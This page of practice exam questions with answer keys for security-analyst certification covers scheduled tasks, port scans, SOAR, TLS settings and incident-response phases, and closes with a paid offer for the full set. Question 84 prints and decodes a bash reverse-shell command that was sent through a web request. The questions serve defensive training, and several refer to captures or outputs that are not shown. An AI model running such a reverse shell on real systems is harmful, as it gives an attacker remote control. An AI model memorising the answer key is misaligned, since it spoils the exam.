A SOC analyst is reviewing the weekly EDR report. The report shows that the same application was blocked once every 24 hours. Which of the following tools should the analyst use to further investigate the incident?
A. Registry Editor
B. services.msc
C. Task Scheduler
D. MSConfig
Show Answer
Correct Answer: C
Explanation: A program being blocked once every 24 hours strongly suggests it is being launched on a recurring schedule. Windows Task Scheduler is the primary tool used to configure and inspect scheduled tasks, making it the appropriate place to investigate recurring execution. Registry Editor, Services, and MSConfig are used for other persistence and startup mechanisms but do not specifically explain a precise 24-hour recurrence.
Question 82
A security analyst receives an alert with the following packet capture:
Which of the following conclusions should the analyst reach about this incident?
A. EnCase is enumerating a server.
B. A Nessus proxy is manipulating traffic.
C. An Nmap scan is occurring.
D. Metasploit is installing on a target.
Show Answer
Correct Answer: C
Explanation: A packet capture showing repeated TCP SYN probes to multiple ports with RST/ACK responses is characteristic of a TCP SYN port scan used to enumerate services. Nmap commonly performs this type of scan. The other options do not match this network traffic pattern.
Question 83
An after-action review of a ransomware attack on a company identified deficiencies in responsiveness and consistency. Which of the following choices would best facilitate improvement of these deficiencies?
A. Leverage a SIEM.
B. Utilize threat intelligence sharing.
C. Source multiple threat feeds.
D. Implement SOAR.
Show Answer
Correct Answer: D
Explanation: SOAR (Security Orchestration, Automation, and Response) directly improves incident response responsiveness and consistency by automating workflows, enforcing standardized playbooks, and orchestrating actions across security tools. A SIEM primarily improves visibility and detection, while threat intelligence sharing and multiple threat feeds enhance awareness and detection rather than response execution.
Question 84
A security analyst identifies the following log entry in the web server logs:
10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+-i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%261 http/1.1" 200 -
Which of the following best explains the log entry?
A. This was caused by an administrator logging in to a website using the command line.
B. This is a successful lateral movement abusing an RCE vulnerability.
C. This is a failed attack attempting to exploit an LFI vulnerability.
D. This was caused by a successful RFI vulnerability exploitation.
Show Answer
Correct Answer: B
Explanation: The request contains a URL-encoded bash reverse shell (`bash -i >& /dev/tcp/10.20.10.22/1234 0>&1`) passed via a `cmd` parameter, which is characteristic of remote code execution through command injection. The HTTP 200 response indicates the request was processed successfully. This is not indicative of LFI or RFI, and it is not a normal administrative login. The reverse shell would provide remote shell access to the compromised host, consistent with successful exploitation of an RCE vulnerability and enabling attacker movement.
Question 85
During the triage of a SIEM alarm, a security analyst identifies the following activity on a .bash_history file:
Which of the following actions should the analyst take?
A. Declare an incident and look for data exfiltration.
B. Declare an incident and look for lateral movements.
C. Declare a false positive and close the alarm.
D. Declare an incident and look for malware in the affected machine.
Show Answer
Correct Answer: A
Explanation: The described .bash_history activity indicates a script that retrieves data and sends it to an external destination, which is characteristic of data exfiltration. This warrants declaring an incident and prioritizing investigation for exfiltration. There is no direct indication of lateral movement, it is not a false positive, and while malware may be involved, the observable behavior most directly points to exfiltration.
Question 86
A security manager reviews the permissions for the approved users of a shared folder and finds accounts that are not on the approved access list. While investigating an incident, a user discovers data discrepancies in the file. Which of the following best describes this activity?
A. Filesystem anomaly
B. Illegal software
C. Unauthorized changes
D. Data exfiltration
Show Answer
Correct Answer: C
Explanation: The presence of accounts with permissions that are not on the approved access list, combined with discovered data discrepancies, indicates the file has likely been modified by unauthorized users. This is best classified as unauthorized changes, reflecting a compromise of data integrity. Filesystem anomalies refer to unusual filesystem behavior, illegal software concerns unauthorized applications, and data exfiltration involves unauthorized data removal rather than modification.
Question 87
Which of the following is the practice of controlling how evidence is handled to ensure its integrity during an investigation?
A. Chain of custody
B. Root cause analysis
C. Incident response
D. Evidence collection
Show Answer
Correct Answer: A
Explanation: Chain of custody is the documented process that tracks and controls the collection, handling, transfer, storage, and preservation of evidence to maintain its integrity and admissibility throughout an investigation.
Question 88
A company’s policy is to follow NIST standards and use strong encryption to avoid disclosure of sensitive information in transit between any systems. An analyst reviews a lab web server and receives the following outputs:
Which of the following should the analyst identify as the most concerning?
A. TLS 1.0 is enabled.
B. The certificate is self-signed.
C. SSLv3 is disabled.
D. TLS 1.3 is not widely supported.
E. TLS compression is disabled.
Show Answer
Correct Answer: A
Explanation: TLS 1.0 is deprecated and no longer meets NIST guidance for protecting sensitive information in transit. NIST SP 800-52 Rev. 2 requires support for TLS 1.2 or later, making an enabled TLS 1.0 endpoint the most significant security concern. A self-signed certificate may be acceptable in a lab environment, SSLv3 being disabled is desirable, TLS 1.3 not being widely supported is not itself a vulnerability, and disabling TLS compression is a recommended mitigation against CRIME attacks.
Question 89
Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective actions?
A. Lessons learned
B. Reporting
C. Recovery
D. Root cause analysis
Show Answer
Correct Answer: C
Explanation: A vulnerability scan to verify that remediation and corrective actions were effective is performed during the Recovery phase, before systems are returned to normal operation. Lessons learned and reporting occur after recovery, while root cause analysis focuses on identifying why the incident occurred rather than validating remediation.
Question 90
An organization adds an MSSP to supplement its security monitoring operations during weekends and holidays. Which of the following would best demonstrate procurement value to the Chief Information Security Officer?
A. Stakeholder validation metrics
B. Mean time to respond
C. Alert volume
D. Number of escalations per week
Show Answer
Correct Answer: B
Explanation: The procurement value of adding an MSSP for weekend and holiday monitoring is best demonstrated by improved operational outcomes, particularly reducing the time it takes to respond to security incidents during periods when internal coverage is limited. Mean time to respond (MTTR) is a key performance metric that directly reflects this benefit. Alert volume does not indicate effectiveness, stakeholder validation is subjective, and the number of escalations alone does not measure improved security outcomes.
$19
Get all 534 questions with detailed answers and explanations
Instant download HTML + PDF delivered the moment payment clears.
Secure Stripe checkout we never see or store your card details.
7-day refund if files are defective see our refund policy.